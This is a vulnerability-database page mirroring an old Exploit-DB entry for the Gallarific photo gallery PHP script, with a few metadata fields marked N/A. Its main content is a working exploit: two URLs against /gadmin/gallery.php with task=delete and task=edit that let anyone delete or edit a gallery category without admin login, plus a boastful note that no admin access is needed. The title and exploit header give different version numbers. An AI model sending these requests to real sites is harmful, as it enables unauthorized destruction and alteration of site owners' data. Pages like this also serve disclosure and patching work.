Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1058121 漏洞类型
发布时间 2009-08-12 更新时间 2009-08-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/9421
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability

//Author: iLker Kandemir -- MEFISTO

//Price : 47 $

//script demo : http://www.gallarific.com/demo/index.php

//[imhatimi.org]

----------------------------------------------------------------
//exploit :

1) http://[site]/gadmin/gallery.php?task=delete&id=1

2) http://[site]/gadmin/gallery.php?task=edit&id=1

----------------------------------------------------------------
//Note:

/* You don't need access to admin-panel ;) */

side note:
Original Advisory without poC : http://secunia.com/advisories/29399

# milw0rm.com [2009-08-12]